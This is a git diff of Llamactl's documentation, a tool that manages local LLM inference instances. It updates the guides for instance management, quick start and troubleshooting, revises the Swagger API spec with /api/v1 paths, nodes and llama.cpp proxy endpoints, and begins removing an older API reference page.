-d '{
"backend_type": "llama_cpp",
"backend_options": {
"hf_repo": "unsloth/gemma-3-27b-it-GGUF",
"hf_file": "gemma-3-27b-it-GGUF.gguf",
"gpu_layers": 32
}
},
"nodes": ["main"]
}'
# Create instance on specific remote node
curl -X POST http://localhost:8080/api/v1/instances/remote-llama \
-H "Content-Type: application/json" \
-H "Authorization: Bearer <token>" \
-d '{
"backend_type": "llama_cpp",
"backend_options": {
"model": "/models/llama-7b.gguf",
"gpu_layers": 32
},
"nodes": ["worker1"]
}'
# Create instance on multiple nodes for high availability
curl -X POST http://localhost:8080/api/v1/instances/multi-node-llama \
-H "Content-Type: application/json" \
-H "Authorization: Bearer <token>" \
-d '{
"backend_type": "llama_cpp",
"backend_options": {
"model": "/models/llama-7b.gguf",
"gpu_layers": 32
},
"nodes": ["worker1", "worker2", "worker3"]
}'
```
## Start Instance
### Via Web UI
**Via Web UI**
1. Click the **"Start"** button on an instance card
2. Watch the status change to "Unknown"
3. Monitor progress in the logs
4. Instance status changes to "Ready" when ready
### Via API
**Via API**
```bash
curl -X POST http://localhost:8080/api/instances/{name}/start
curl -X POST http://localhost:8080/api/v1/instances/{name}/start \
-H "Authorization: Bearer <token>"
```
## Stop Instance
### Via Web UI
**Via Web UI**
1. Click the **"Stop"** button on an instance card
2. Instance gracefully shuts down
### Via API
**Via API**
```bash
curl -X POST http://localhost:8080/api/instances/{name}/stop
curl -X POST http://localhost:8080/api/v1/instances/{name}/stop \
-H "Authorization: Bearer <token>"
```
## Edit Instance
### Via Web UI
**Via Web UI**
1. Click the **"Edit"** button on an instance card
2. Modify settings in the configuration dialog
3. Changes require instance restart to take effect
4. Click **"Update & Restart"** to apply changes
### Via API
**Via API**
Modify instance settings:
```bash
curl -X PUT http://localhost:8080/api/instances/{name} \
curl -X PUT http://localhost:8080/api/v1/instances/{name} \
-H "Content-Type: application/json" \
-H "Authorization: Bearer <token>" \
-d '{
"backend_options": {
"threads": 8,
@@ -173,31 +220,39 @@ curl -X PUT http://localhost:8080/api/instances/{name} \
Configuration changes require restarting the instance to take effect.
## Export Instance
**Via Web UI**
1. Click the **"More actions"** button (three dots) on an instance card
2. Click **"Export"** to download the instance configuration as a JSON file
## View Logs
### Via Web UI
**Via Web UI**
1. Click the **"Logs"** button on any instance card
2. Real-time log viewer opens
### Via API
**Via API**
Check instance status in real-time:
```bash
# Get instance details
curl http://localhost:8080/api/instances/{name}/logs
# Get instance logs
curl http://localhost:8080/api/v1/instances/{name}/logs \
-H "Authorization: Bearer <token>"
```
## Delete Instance
### Via Web UI
**Via Web UI**
1. Click the **"Delete"** button on an instance card
2. Only stopped instances can be deleted
3. Confirm deletion in the dialog
### Via API
**Via API**
```bash
curl -X DELETE http://localhost:8080/api/instances/{name}
curl -X DELETE http://localhost:8080/api/v1/instances/{name} \
-H "Authorization: Bearer <token>"
```
## Instance Proxy
@@ -205,8 +260,9 @@ curl -X DELETE http://localhost:8080/api/instances/{name}
Llamactl proxies all requests to the underlying backend instances (llama-server, MLX, or vLLM).
```bash
# Get instance details
curl http://localhost:8080/api/instances/{name}/proxy/
# Proxy requests to the instance
curl http://localhost:8080/api/v1/instances/{name}/proxy/ \
-H "Authorization: Bearer <token>"
```
All backends provide OpenAI-compatible endpoints. Check the respective documentation:
@@ -216,14 +272,16 @@ All backends provide OpenAI-compatible endpoints. Check the respective documenta
### Instance Health
#### Via Web UI
**Via Web UI**
1. The health status badge is displayed on each instance card
#### Via API
**Via API**
Check the health status of your instances:
```bash
curl http://localhost:8080/api/instances/{name}/proxy/health
curl http://localhost:8080/api/v1/instances/{name}/proxy/health \
-H "Authorization: Bearer <token>"
```

263
docs/quick-start.md Normal file
View File

@@ -0,0 +1,263 @@
# Quick Start
This guide will help you get Llamactl up and running in just a few minutes.
**Before you begin:** Ensure you have at least one backend installed (llama.cpp, MLX, or vLLM). See the [Installation Guide](installation.md#prerequisites) for backend setup.
## Core Concepts
Before you start, let's clarify a few key terms:
- **Instance**: A running backend server that serves a specific model. Each instance has a unique name and runs independently.
- **Backend**: The inference engine that actually runs the model (llama.cpp, MLX, or vLLM). You need at least one backend installed before creating instances.
- **Node**: In multi-machine setups, a node represents one machine. Most users will just use the default "main" node for single-machine deployments.
- **Proxy Architecture**: Llamactl acts as a proxy in front of your instances. You make requests to llamactl (e.g., `http://localhost:8080/v1/chat/completions`), and it routes them to the appropriate backend instance. This means you don't need to track individual instance ports or endpoints.
## Authentication
Llamactl uses two types of API keys:
- **Management API Key**: Used to authenticate with the Llamactl management API (creating, starting, stopping instances).
- **Inference API Key**: Used to authenticate requests to the OpenAI-compatible endpoints (`/v1/chat/completions`, `/v1/completions`, etc.).
By default, authentication is required. If you don't configure these keys in your configuration file, llamactl will auto-generate them and print them to the terminal on startup. You can also configure custom keys or disable authentication entirely in the [Configuration](configuration.md) guide.
## Start Llamactl
Start the Llamactl server:
```bash
llamactl
```
```
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
⚠️ MANAGEMENT AUTHENTICATION REQUIRED
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
🔑 Generated Management API Key:
sk-management-...
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
⚠️ INFERENCE AUTHENTICATION REQUIRED
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
🔑 Generated Inference API Key:
sk-inference-...
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
⚠️ IMPORTANT
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
• These keys are auto-generated and will change on restart
• For production, add explicit keys to your configuration
• Copy these keys before they disappear from the terminal
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Llamactl server listening on 0.0.0.0:8080
```
Copy the **Management** and **Inference** API Keys from the terminal - you'll need them to access the web UI and make inference requests.
By default, Llamactl will start on `http://localhost:8080`.
## Access the Web UI
Open your web browser and navigate to:
```
http://localhost:8080
```
Login with the management API key from the terminal output.
You should see the Llamactl web interface.
## Create Your First Instance
1. Click the "Add Instance" button
2. Fill in the instance configuration:
- **Name**: Give your instance a descriptive name
- **Node**: Select which node to deploy the instance to (defaults to "main" for single-node setups)
- **Backend Type**: Choose from llama.cpp, MLX, or vLLM
- **Model**: Model path or huggingface repo
- **Additional Options**: Backend-specific parameters
!!! tip "Auto-Assignment"
Llamactl automatically assigns ports from the configured port range (default: 8000-9000) and generates API keys if authentication is enabled. You typically don't need to manually specify these values.
!!! note "Remote Node Deployment"
If you have configured remote nodes in your configuration file, you can select which node to deploy the instance to. This allows you to distribute instances across multiple machines. See the [Configuration](configuration.md#remote-node-configuration) guide for details on setting up remote nodes.
3. Click "Create Instance"
## Start Your Instance
Once created, you can:
- **Start** the instance by clicking the start button
- **Monitor** its status in real-time
- **View logs** by clicking the logs button
- **Stop** the instance when needed
## Example Configurations
Here are basic example configurations for each backend:
**llama.cpp backend:**
```json
{
"name": "llama2-7b",
"backend_type": "llama_cpp",
"backend_options": {
"model": "/path/to/llama-2-7b-chat.gguf",
"threads": 4,
"ctx_size": 2048,
"gpu_layers": 32
},
"nodes": ["main"]
}
```
**MLX backend (macOS only):**
```json
{
"name": "mistral-mlx",
"backend_type": "mlx_lm",
"backend_options": {
"model": "mlx-community/Mistral-7B-Instruct-v0.3-4bit",
"temp": 0.7,
"max_tokens": 2048
},
"nodes": ["main"]
}
```
**vLLM backend:**
```json
{
"name": "dialogpt-vllm",
"backend_type": "vllm",
"backend_options": {
"model": "microsoft/DialoGPT-medium",
"tensor_parallel_size": 2,
"gpu_memory_utilization": 0.9
},
"nodes": ["main"]
}
```
**Remote node deployment example:**
```json
{
"name": "distributed-model",
"backend_type": "llama_cpp",
"backend_options": {
"model": "/path/to/model.gguf",
"gpu_layers": 32
},
"nodes": ["worker1"]
}
```
## Docker Support
Llamactl can run backends in Docker containers. To enable Docker for a backend, add a `docker` section to that backend in your YAML configuration file (e.g. `config.yaml`) as shown below:
```yaml
backends:
vllm:
command: "vllm"
args: ["serve"]
docker:
enabled: true
image: "vllm/vllm-openai:latest"
args: ["run", "--rm", "--network", "host", "--gpus", "all", "--shm-size", "1g"]
```
## Using the API
You can also manage instances via the REST API:
```bash
# List all instances
curl http://localhost:8080/api/v1/instances
# Create a new llama.cpp instance
curl -X POST http://localhost:8080/api/v1/instances/my-model \
-H "Content-Type: application/json" \
-d '{
"backend_type": "llama_cpp",
"backend_options": {
"model": "/path/to/model.gguf"
}
}'
# Start an instance
curl -X POST http://localhost:8080/api/v1/instances/my-model/start
```
## OpenAI Compatible API
Llamactl provides OpenAI-compatible endpoints, making it easy to integrate with existing OpenAI client libraries and tools.
### Chat Completions
Once you have an instance running, you can use it with the OpenAI-compatible chat completions endpoint:
```bash
curl -X POST http://localhost:8080/v1/chat/completions \
-H "Content-Type: application/json" \
-d '{
"model": "my-model",
"messages": [
{
"role": "user",
"content": "Hello! Can you help me write a Python function?"
}
],
"max_tokens": 150,
"temperature": 0.7
}'
```
### Using with Python OpenAI Client
You can also use the official OpenAI Python client:
```python
from openai import OpenAI
# Point the client to your Llamactl server
client = OpenAI(
base_url="http://localhost:8080/v1",
api_key="your-inference-api-key" # Use the inference API key from terminal or config
)
# Create a chat completion
response = client.chat.completions.create(
model="my-model", # Use the name of your instance
messages=[
{"role": "user", "content": "Explain quantum computing in simple terms"}
],
max_tokens=200,
temperature=0.7
)
print(response.choices[0].message.content)
```
!!! note "API Key"
If you disabled authentication in your config, you can use any value for `api_key` (e.g., `"not-needed"`). Otherwise, use the inference API key shown in the terminal output on startup.
### List Available Models
Get a list of running instances (models) in OpenAI-compatible format:
```bash
curl http://localhost:8080/v1/models
```
## Next Steps
- Manage instances [Managing Instances](managing-instances.md)
- Explore the [API Reference](api-reference.md)
- Configure advanced settings in the [Configuration](configuration.md) guide

File diff suppressed because it is too large Load Diff

View File

@@ -1,25 +1,23 @@
basePath: /api/v1
definitions:
backends.BackendType:
enum:
- llama_cpp
- mlx_lm
- vllm
type: string
x-enum-varnames:
- BackendTypeLlamaCpp
- BackendTypeMlxLm
- BackendTypeVllm
instance.CreateInstanceOptions:
instance.Instance:
properties:
created:
description: Unix timestamp when the instance was created
type: integer
name:
type: string
type: object
instance.Options:
properties:
auto_restart:
description: Auto restart
type: boolean
backend_options:
additionalProperties: {}
environment:
additionalProperties:
type: string
description: Environment variables
type: object
backend_type:
$ref: '#/definitions/backends.BackendType'
idle_timeout:
description: Idle timeout
type: integer
@@ -32,27 +30,10 @@ definitions:
description: seconds
type: integer
type: object
instance.InstanceStatus:
enum:
- 0
- 1
- 2
type: integer
x-enum-varnames:
- Stopped
- Running
- Failed
instance.Process:
server.NodeResponse:
properties:
created:
description: Creation time
type: integer
name:
address:
type: string
status:
allOf:
- $ref: '#/definitions/instance.InstanceStatus'
description: Status
type: object
server.OpenAIInstance:
properties:
@@ -88,7 +69,7 @@ info:
title: llamactl API
version: "1.0"
paths:
/backends/llama-cpp/devices:
/api/v1/backends/llama-cpp/devices:
get:
description: Returns a list of available devices for the llama server
responses:
@@ -104,8 +85,8 @@ paths:
- ApiKeyAuth: []
summary: List available devices for llama server
tags:
- backends
/backends/llama-cpp/help:
- Backends
/api/v1/backends/llama-cpp/help:
get:
description: Returns the help text for the llama server command
responses:
@@ -121,8 +102,8 @@ paths:
- ApiKeyAuth: []
summary: Get help for llama server
tags:
- backends
/backends/llama-cpp/parse-command:
- Backends
/api/v1/backends/llama-cpp/parse-command:
post:
consumes:
- application/json
@@ -140,7 +121,7 @@ paths:
"200":
description: Parsed options
schema:
$ref: '#/definitions/instance.CreateInstanceOptions'
$ref: '#/definitions/instance.Options'
"400":
description: Invalid request or command
schema:
@@ -157,8 +138,8 @@ paths:
- ApiKeyAuth: []
summary: Parse llama-server command
tags:
- backends
/backends/llama-cpp/version:
- Backends
/api/v1/backends/llama-cpp/version:
get:
description: Returns the version of the llama server command
responses:
@@ -174,8 +155,8 @@ paths:
- ApiKeyAuth: []
summary: Get version of llama server
tags:
- backends
/backends/mlx/parse-command:
- Backends
/api/v1/backends/mlx/parse-command:
post:
consumes:
- application/json
@@ -193,7 +174,7 @@ paths:
"200":
description: Parsed options
schema:
$ref: '#/definitions/instance.CreateInstanceOptions'
$ref: '#/definitions/instance.Options'
"400":
description: Invalid request or command
schema:
@@ -204,8 +185,8 @@ paths:
- ApiKeyAuth: []
summary: Parse mlx_lm.server command
tags:
- backends
/backends/vllm/parse-command:
- Backends
/api/v1/backends/vllm/parse-command:
post:
consumes:
- application/json
@@ -223,7 +204,7 @@ paths:
"200":
description: Parsed options
schema:
$ref: '#/definitions/instance.CreateInstanceOptions'
$ref: '#/definitions/instance.Options'
"400":
description: Invalid request or command
schema:
@@ -234,8 +215,8 @@ paths:
- ApiKeyAuth: []
summary: Parse vllm serve command
tags:
- backends
/instances:
- Backends
/api/v1/instances:
get:
description: Returns a list of all instances managed by the server
responses:
@@ -243,7 +224,7 @@ paths:
description: List of instances
schema:
items:
$ref: '#/definitions/instance.Process'
$ref: '#/definitions/instance.Instance'
type: array
"500":
description: Internal Server Error
@@ -253,8 +234,8 @@ paths:
- ApiKeyAuth: []
summary: List all instances
tags:
- instances
/instances/{name}:
- Instances
/api/v1/instances/{name}:
delete:
description: Stops and removes a specific instance by name
parameters:
@@ -278,7 +259,7 @@ paths:
- ApiKeyAuth: []
summary: Delete an instance
tags:
- instances
- Instances
get:
description: Returns the details of a specific instance by name
parameters:
@@ -291,7 +272,7 @@ paths:
"200":
description: Instance details
schema:
$ref: '#/definitions/instance.Process'
$ref: '#/definitions/instance.Instance'
"400":
description: Invalid name format
schema:
@@ -304,7 +285,7 @@ paths:
- ApiKeyAuth: []
summary: Get details of a specific instance
tags:
- instances
- Instances
post:
consumes:
- application/json
@@ -320,12 +301,12 @@ paths:
name: options
required: true
schema:
$ref: '#/definitions/instance.CreateInstanceOptions'
$ref: '#/definitions/instance.Options'
responses:
"201":
description: Created instance details
schema:
$ref: '#/definitions/instance.Process'
$ref: '#/definitions/instance.Instance'
"400":
description: Invalid request body
schema:
@@ -338,7 +319,7 @@ paths:
- ApiKeyAuth: []
summary: Create and start a new instance
tags:
- instances
- Instances
put:
consumes:
- application/json
@@ -354,12 +335,12 @@ paths:
name: options
required: true
schema:
$ref: '#/definitions/instance.CreateInstanceOptions'
$ref: '#/definitions/instance.Options'
responses:
"200":
description: Updated instance details
schema:
$ref: '#/definitions/instance.Process'
$ref: '#/definitions/instance.Instance'
"400":
description: Invalid name format
schema:
@@ -372,8 +353,8 @@ paths:
- ApiKeyAuth: []
summary: Update an instance's configuration
tags:
- instances
/instances/{name}/logs:
- Instances
/api/v1/instances/{name}/logs:
get:
description: Returns the logs from a specific instance by name with optional
line limit
@@ -404,8 +385,8 @@ paths:
- ApiKeyAuth: []
summary: Get logs from a specific instance
tags:
- instances
/instances/{name}/proxy:
- Instances
/api/v1/instances/{name}/proxy:
get:
description: Forwards HTTP requests to the llama-server instance running on
a specific port
@@ -432,9 +413,10 @@ paths:
type: string
security:
- ApiKeyAuth: []
summary: Proxy requests to a specific instance
summary: Proxy requests to a specific instance, does not autostart instance
if stopped
tags:
- instances
- Instances
post:
description: Forwards HTTP requests to the llama-server instance running on
a specific port
@@ -461,10 +443,11 @@ paths:
type: string
security:
- ApiKeyAuth: []
summary: Proxy requests to a specific instance
summary: Proxy requests to a specific instance, does not autostart instance
if stopped
tags:
- instances
/instances/{name}/restart:
- Instances
/api/v1/instances/{name}/restart:
post:
description: Restarts a specific instance by name
parameters:
@@ -477,7 +460,7 @@ paths:
"200":
description: Restarted instance details
schema:
$ref: '#/definitions/instance.Process'
$ref: '#/definitions/instance.Instance'
"400":
description: Invalid name format
schema:
@@ -490,8 +473,8 @@ paths:
- ApiKeyAuth: []
summary: Restart a running instance
tags:
- instances
/instances/{name}/start:
- Instances
/api/v1/instances/{name}/start:
post:
description: Starts a specific instance by name
parameters:
@@ -504,7 +487,7 @@ paths:
"200":
description: Started instance details
schema:
$ref: '#/definitions/instance.Process'
$ref: '#/definitions/instance.Instance'
"400":
description: Invalid name format
schema:
@@ -517,8 +500,8 @@ paths:
- ApiKeyAuth: []
summary: Start a stopped instance
tags:
- instances
/instances/{name}/stop:
- Instances
/api/v1/instances/{name}/stop:
post:
description: Stops a specific instance by name
parameters:
@@ -531,7 +514,7 @@ paths:
"200":
description: Stopped instance details
schema:
$ref: '#/definitions/instance.Process'
$ref: '#/definitions/instance.Instance'
"400":
description: Invalid name format
schema:
@@ -544,7 +527,444 @@ paths:
- ApiKeyAuth: []
summary: Stop a running instance
tags:
- instances
- Instances
/api/v1/nodes:
get:
description: Returns a map of all nodes configured in the server (node name
-> node config)
responses:
"200":
description: Map of nodes
schema:
additionalProperties:
$ref: '#/definitions/server.NodeResponse'
type: object
"500":
description: Internal Server Error
schema:
type: string
security:
- ApiKeyAuth: []
summary: List all configured nodes
tags:
- Nodes
/api/v1/nodes/{name}:
get:
description: Returns the details of a specific node by name
parameters:
- description: Node Name
in: path
name: name
required: true
type: string
responses:
"200":
description: Node details
schema:
$ref: '#/definitions/server.NodeResponse'
"400":
description: Invalid name format
schema:
type: string
"404":
description: Node not found
schema:
type: string
"500":
description: Internal Server Error
schema:
type: string
security:
- ApiKeyAuth: []
summary: Get details of a specific node
tags:
- Nodes
/api/v1/version:
get:
description: Returns the version of the llamactl command
responses:
"200":
description: Version information
schema:
type: string
"500":
description: Internal Server Error
schema:
type: string
security:
- ApiKeyAuth: []
summary: Get llamactl version
tags:
- System
/llama-cpp/{name}/:
get:
description: Proxies requests to the llama.cpp UI for the specified instance
parameters:
- description: Instance Name
in: query
name: name
required: true
type: string
produces:
- text/html
responses:
"200":
description: Proxied HTML response
schema:
type: string
"400":
description: Invalid instance
schema:
type: string
"500":
description: Internal Server Error
schema:
type: string
security:
- ApiKeyAuth: []
summary: Proxy requests to llama.cpp UI for the instance
tags:
- Llama.cpp
/llama-cpp/{name}/apply-template:
post:
description: Proxies requests to the specified llama.cpp server instance, starting
it on-demand if configured
parameters:
- description: Instance Name
in: path
name: name
required: true
type: string
produces:
- application/json
responses:
"200":
description: Proxied response
schema:
additionalProperties: true
type: object
"400":
description: Invalid instance
schema:
type: string
"500":
description: Internal Server Error
schema:
type: string
security:
- ApiKeyAuth: []
summary: Proxy requests to llama.cpp server instance
tags:
- Llama.cpp
/llama-cpp/{name}/completion:
post:
description: Proxies requests to the specified llama.cpp server instance, starting
it on-demand if configured
parameters:
- description: Instance Name
in: path
name: name
required: true
type: string
produces:
- application/json
responses:
"200":
description: Proxied response
schema:
additionalProperties: true
type: object
"400":
description: Invalid instance
schema:
type: string
"500":
description: Internal Server Error
schema:
type: string
security:
- ApiKeyAuth: []
summary: Proxy requests to llama.cpp server instance
tags:
- Llama.cpp
/llama-cpp/{name}/detokenize:
post:
description: Proxies requests to the specified llama.cpp server instance, starting
it on-demand if configured
parameters:
- description: Instance Name
in: path
name: name
required: true
type: string
produces:
- application/json
responses:
"200":
description: Proxied response
schema:
additionalProperties: true
type: object
"400":
description: Invalid instance
schema:
type: string
"500":
description: Internal Server Error
schema:
type: string
security:
- ApiKeyAuth: []
summary: Proxy requests to llama.cpp server instance
tags:
- Llama.cpp
/llama-cpp/{name}/embeddings:
post:
description: Proxies requests to the specified llama.cpp server instance, starting
it on-demand if configured
parameters:
- description: Instance Name
in: path
name: name
required: true
type: string
produces:
- application/json
responses:
"200":
description: Proxied response
schema:
additionalProperties: true
type: object
"400":
description: Invalid instance
schema:
type: string
"500":
description: Internal Server Error
schema:
type: string
security:
- ApiKeyAuth: []
summary: Proxy requests to llama.cpp server instance
tags:
- Llama.cpp
/llama-cpp/{name}/infill:
post:
description: Proxies requests to the specified llama.cpp server instance, starting
it on-demand if configured
parameters:
- description: Instance Name
in: path
name: name
required: true
type: string
produces:
- application/json
responses:
"200":
description: Proxied response
schema:
additionalProperties: true
type: object
"400":
description: Invalid instance
schema:
type: string
"500":
description: Internal Server Error
schema:
type: string
security:
- ApiKeyAuth: []
summary: Proxy requests to llama.cpp server instance
tags:
- Llama.cpp
/llama-cpp/{name}/metrics:
post:
description: Proxies requests to the specified llama.cpp server instance, starting
it on-demand if configured
parameters:
- description: Instance Name
in: path
name: name
required: true
type: string
produces:
- application/json
responses:
"200":
description: Proxied response
schema:
additionalProperties: true
type: object
"400":
description: Invalid instance
schema:
type: string
"500":
description: Internal Server Error
schema:
type: string
security:
- ApiKeyAuth: []
summary: Proxy requests to llama.cpp server instance
tags:
- Llama.cpp
/llama-cpp/{name}/props:
get:
description: Proxies requests to the specified llama.cpp server instance, starting
it on-demand if configured
parameters:
- description: Instance Name
in: path
name: name
required: true
type: string
produces:
- application/json
responses:
"200":
description: Proxied response
schema:
additionalProperties: true
type: object
"400":
description: Invalid instance
schema:
type: string
"500":
description: Internal Server Error
schema:
type: string
security:
- ApiKeyAuth: []
summary: Proxy requests to llama.cpp server instance
tags:
- Llama.cpp
post:
description: Proxies requests to the specified llama.cpp server instance, starting
it on-demand if configured
parameters:
- description: Instance Name
in: path
name: name
required: true
type: string
produces:
- application/json
responses:
"200":
description: Proxied response
schema:
additionalProperties: true
type: object
"400":
description: Invalid instance
schema:
type: string
"500":
description: Internal Server Error
schema:
type: string
security:
- ApiKeyAuth: []
summary: Proxy requests to llama.cpp server instance
tags:
- Llama.cpp
/llama-cpp/{name}/reranking:
post:
description: Proxies requests to the specified llama.cpp server instance, starting
it on-demand if configured
parameters:
- description: Instance Name
in: path
name: name
required: true
type: string
produces:
- application/json
responses:
"200":
description: Proxied response
schema:
additionalProperties: true
type: object
"400":
description: Invalid instance
schema:
type: string
"500":
description: Internal Server Error
schema:
type: string
security:
- ApiKeyAuth: []
summary: Proxy requests to llama.cpp server instance
tags:
- Llama.cpp
/llama-cpp/{name}/slots:
get:
description: Proxies requests to the specified llama.cpp server instance, starting
it on-demand if configured
parameters:
- description: Instance Name
in: path
name: name
required: true
type: string
produces:
- application/json
responses:
"200":
description: Proxied response
schema:
additionalProperties: true
type: object
"400":
description: Invalid instance
schema:
type: string
"500":
description: Internal Server Error
schema:
type: string
security:
- ApiKeyAuth: []
summary: Proxy requests to llama.cpp server instance
tags:
- Llama.cpp
/llama-cpp/{name}/tokenize:
post:
description: Proxies requests to the specified llama.cpp server instance, starting
it on-demand if configured
parameters:
- description: Instance Name
in: path
name: name
required: true
type: string
produces:
- application/json
responses:
"200":
description: Proxied response
schema:
additionalProperties: true
type: object
"400":
description: Invalid instance
schema:
type: string
"500":
description: Internal Server Error
schema:
type: string
security:
- ApiKeyAuth: []
summary: Proxy requests to llama.cpp server instance
tags:
- Llama.cpp
/v1/:
post:
consumes:
@@ -567,7 +987,7 @@ paths:
- ApiKeyAuth: []
summary: OpenAI-compatible proxy endpoint
tags:
- openai
- OpenAI
/v1/models:
get:
description: Returns a list of instances in a format compatible with OpenAI
@@ -585,22 +1005,10 @@ paths:
- ApiKeyAuth: []
summary: List instances in OpenAI-compatible format
tags:
- openai
/version:
get:
description: Returns the version of the llamactl command
responses:
"200":
description: Version information
schema:
type: string
"500":
description: Internal Server Error
schema:
type: string
security:
- ApiKeyAuth: []
summary: Get llamactl version
tags:
- version
- OpenAI
securityDefinitions:
ApiKeyAuth:
in: header
name: X-API-Key
type: apiKey
swagger: "2.0"

193
docs/troubleshooting.md Normal file
View File

@@ -0,0 +1,193 @@
# Troubleshooting
Issues specific to Llamactl deployment and operation.
## Configuration Issues
### Invalid Configuration
**Problem:** Invalid configuration preventing startup
**Solutions:**
1. Use minimal configuration:
```yaml
server:
host: "0.0.0.0"
port: 8080
instances:
port_range: [8000, 9000]
```
2. Check data directory permissions:
```bash
# Ensure data directory is writable (default: ~/.local/share/llamactl)
mkdir -p ~/.local/share/llamactl/{instances,logs}
```
## Instance Management Issues
### Instance Fails to Start
**Problem:** Instance fails to start or immediately stops
**Solutions:**
1. **Check instance logs** to see the actual error:
```bash
curl http://localhost:8080/api/v1/instances/{name}/logs
# Or check log files directly
tail -f ~/.local/share/llamactl/logs/{instance-name}.log
```
2. **Verify backend is installed:**
- **llama.cpp**: Ensure `llama-server` is in PATH
- **MLX**: Ensure `mlx-lm` Python package is installed
- **vLLM**: Ensure `vllm` Python package is installed
3. **Check model path and format:**
- Use absolute paths to model files
- Verify model format matches backend (GGUF for llama.cpp, etc.)
4. **Verify backend command configuration:**
- Check that the backend `command` is correctly configured in the global config
- For virtual environments, specify the full path to the command (e.g., `/path/to/venv/bin/mlx_lm.server`)
- See the [Configuration Guide](configuration.md) for backend configuration details
- Test the backend directly (see [Backend-Specific Issues](#backend-specific-issues) below)
### Backend-Specific Issues
**Problem:** Model loading, memory, GPU, or performance issues
Most model-specific issues (memory, GPU configuration, performance tuning) are backend-specific and should be resolved by consulting the respective backend documentation:
**llama.cpp:**
- [llama.cpp GitHub](https://github.com/ggml-org/llama.cpp)
- [llama-server README](https://github.com/ggml-org/llama.cpp/blob/master/tools/server/README.md)
**MLX:**
- [MLX-LM GitHub](https://github.com/ml-explore/mlx-lm)
- [MLX-LM Server Guide](https://github.com/ml-explore/mlx-lm/blob/main/mlx_lm/SERVER.md)
**vLLM:**
- [vLLM Documentation](https://docs.vllm.ai/en/stable/)
- [OpenAI Compatible Server](https://docs.vllm.ai/en/stable/serving/openai_compatible_server.html)
- [vllm serve Command](https://docs.vllm.ai/en/stable/cli/serve.html#vllm-serve)
**Testing backends directly:**
Testing your model and configuration directly with the backend helps determine if the issue is with llamactl or the backend itself:
```bash
# llama.cpp
llama-server --model /path/to/model.gguf --port 8081
# MLX
mlx_lm.server --model mlx-community/Mistral-7B-Instruct-v0.3-4bit --port 8081
# vLLM
vllm serve microsoft/DialoGPT-medium --port 8081
```
## API and Network Issues
### CORS Errors
**Problem:** Web UI shows CORS errors in browser console
**Solutions:**
1. **Configure allowed origins:**
```yaml
server:
allowed_origins:
- "http://localhost:3000"
- "https://yourdomain.com"
```
## Authentication Issues
**Problem:** API requests failing with authentication errors
**Solutions:**
1. **Disable authentication temporarily:**
```yaml
auth:
require_management_auth: false
require_inference_auth: false
```
2. **Configure API keys:**
```yaml
auth:
management_keys:
- "your-management-key"
inference_keys:
- "your-inference-key"
```
3. **Use correct Authorization header:**
```bash
curl -H "Authorization: Bearer your-api-key" \
http://localhost:8080/api/v1/instances
```
## Remote Node Issues
### Node Configuration
**Problem:** Remote instances not appearing or cannot be managed
**Solutions:**
1. **Verify node configuration:**
```yaml
local_node: "main" # Must match a key in nodes map
nodes:
main:
address: "" # Empty for local node
worker1:
address: "http://worker1.internal:8080"
api_key: "secure-key" # Must match worker1's management key
```
2. **Check node name consistency:**
- `local_node` on each node must match what other nodes call it
- Node names are case-sensitive
3. **Test remote node connectivity:**
```bash
curl -H "Authorization: Bearer remote-node-key" \
http://remote-node:8080/api/v1/instances
```
## Debugging and Logs
### Viewing Instance Logs
```bash
# Get instance logs via API
curl http://localhost:8080/api/v1/instances/{name}/logs
# Or check log files directly
tail -f ~/.local/share/llamactl/logs/{instance-name}.log
```
### Enable Debug Logging
```bash
export LLAMACTL_LOG_LEVEL=debug
llamactl
```
## Getting Help
When reporting issues, include:
1. **System information:**
```bash
llamactl --version
```
2. **Configuration file** (remove sensitive keys)
3. **Relevant log output**
4. **Steps to reproduce the issue**

View File

@@ -1,527 +0,0 @@
# API Reference
Complete reference for the Llamactl REST API.
## Base URL
All API endpoints are relative to the base URL:
```
http://localhost:8080/api/v1
```
## Authentication
Llamactl supports API key authentication. If authentication is enabled, include the API key in the Authorization header:
```bash
curl -H "Authorization: Bearer <your-api-key>" \
http://localhost:8080/api/v1/instances
```
The server supports two types of API keys:
- **Management API Keys**: Required for instance management operations (CRUD operations on instances)
- **Inference API Keys**: Required for OpenAI-compatible inference endpoints
## System Endpoints
### Get Llamactl Version
Get the version information of the llamactl server.
```http
GET /api/v1/version
```
**Response:**
```
Version: 1.0.0
Commit: abc123
Build Time: 2024-01-15T10:00:00Z
```
### Get Llama Server Help
Get help text for the llama-server command.
```http
GET /api/v1/server/help
```
**Response:** Plain text help output from `llama-server --help`
### Get Llama Server Version
Get version information of the llama-server binary.
```http
GET /api/v1/server/version
```
**Response:** Plain text version output from `llama-server --version`
### List Available Devices
List available devices for llama-server.
```http
GET /api/v1/server/devices
```
**Response:** Plain text device list from `llama-server --list-devices`
## Instances
### List All Instances
Get a list of all instances.
```http
GET /api/v1/instances
```
**Response:**
```json
[
{
"name": "llama2-7b",
"status": "running",
"created": 1705312200
}
]
```
### Get Instance Details
Get detailed information about a specific instance.
```http
GET /api/v1/instances/{name}
```
**Response:**
```json
{
"name": "llama2-7b",
"status": "running",
"created": 1705312200
}
```
### Create Instance
Create and start a new instance.
```http
POST /api/v1/instances/{name}
```
**Request Body:** JSON object with instance configuration. Common fields include:
- `backend_type`: Backend type (`llama_cpp`, `mlx_lm`, or `vllm`)
- `backend_options`: Backend-specific configuration
- `auto_restart`: Enable automatic restart on failure
- `max_restarts`: Maximum restart attempts
- `restart_delay`: Delay between restarts in seconds
- `on_demand_start`: Start instance when receiving requests
- `idle_timeout`: Idle timeout in minutes
- `environment`: Environment variables as key-value pairs
See [Managing Instances](managing-instances.md) for complete configuration options.
**Response:**
```json
{
"name": "llama2-7b",
"status": "running",
"created": 1705312200
}
```
### Update Instance
Update an existing instance configuration. See [Managing Instances](managing-instances.md) for available configuration options.
```http
PUT /api/v1/instances/{name}
```
**Request Body:** JSON object with configuration fields to update.
**Response:**
```json
{
"name": "llama2-7b",
"status": "running",
"created": 1705312200
}
```
### Delete Instance
Stop and remove an instance.
```http
